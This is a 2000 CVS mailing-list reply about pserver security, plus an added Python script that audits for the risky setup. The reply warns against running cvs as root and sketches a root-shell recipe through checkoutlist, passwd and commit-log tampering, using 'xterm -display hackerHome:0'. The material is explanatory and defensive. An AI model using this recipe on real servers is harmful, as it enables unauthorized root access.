On Fri, Oct 13, 2000 at 10:42:17AM -0400, Larry Jones wrote:
> Mike Castle writes:
> > 
> > I was always under the impression that those using OpenBSD were doing so for
> > security reasons.  And pserver is far from secure!
> 
> As long as all the users have shell accounts on the server, a typical
> pserver installation won't allow them to do anything they couldn't do
> from the shell account.  pserver is only a security problem when you
> want to allow access to untrusted users.
>
And as long as you don't run cvs as "root" from inetd.
This is _very_ important, otherwise add passwd to the checkoutlist
(when you have write access) add root:apasswd:root and add
an xterm -display hackerHome:0 to the commitlog, voila: root shell.

If you want multiple repositories on one server use setuid wrappers.

Martin
 

_______________________________________________
Info-cvs mailing list
[EMAIL PROTECTED]
http://mail.gnu.org/mailman/listinfo/info-cvs
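
An added example, not part of the original thread: a small audit for the three conditions Martin's reply depends on (pserver started as root from inetd, a CVSROOT/passwd entry that maps to root, and passwd listed in checkoutlist). The function names, paths and sample file contents are constructed for illustration.

```python
# Added example: audit for the risky pserver setup described in the thread.
# All sample file contents below are constructed, not taken from a real host.

def audit_inetd(inetd_conf):
    """Flag inetd.conf entries that start 'cvs ... pserver' as root."""
    findings = []
    for n, line in enumerate(inetd_conf.splitlines(), 1):
        fields = line.split("#", 1)[0].split()
        # inetd.conf fields: service socktype proto wait user program args...
        if len(fields) < 7 or "pserver" not in fields[6:]:
            continue
        user = fields[4].split(":")[0].split(".")[0]  # user, user:group, user.group
        if user == "root":
            findings.append(f"inetd.conf:{n}: pserver runs as root")
    return findings

def audit_cvsroot_passwd(passwd):
    """Flag CVSROOT/passwd lines (user:crypt[:system_user]) that run as root."""
    findings = []
    for n, line in enumerate(passwd.splitlines(), 1):
        parts = line.strip().split(":")
        if not parts[0]:
            continue
        # With no third field, the CVS user name is also the system user.
        system_user = parts[2] if len(parts) > 2 and parts[2] else parts[0]
        if system_user == "root":
            findings.append(f"passwd:{n}: CVS user '{parts[0]}' maps to root")
    return findings

def audit_checkoutlist(checkoutlist):
    """Flag a checkoutlist that rebuilds CVSROOT/passwd from committed files."""
    for n, line in enumerate(checkoutlist.splitlines(), 1):
        fields = line.split("#", 1)[0].split()
        if fields and fields[0] == "passwd":
            return [f"checkoutlist:{n}: passwd is managed through commits"]
    return []

SAMPLE_INETD = """\
# constructed sample
cvspserver stream tcp nowait root /usr/bin/cvs cvs --allow-root=/cvs pserver
cvspserver stream tcp nowait cvsd /usr/bin/cvs cvs --allow-root=/cvs2 pserver
"""
SAMPLE_PASSWD = "alice:xxPLACEHOLDERa:cvsuser\nroot:xxPLACEHOLDERb\nbob:xxPLACEHOLDERc:root\n"
SAMPLE_CHECKOUTLIST = "# constructed sample\npasswd\n"

if __name__ == "__main__":
    for finding in (audit_inetd(SAMPLE_INETD) + audit_cvsroot_passwd(SAMPLE_PASSWD)
                    + audit_checkoutlist(SAMPLE_CHECKOUTLIST)):
        print(finding)
```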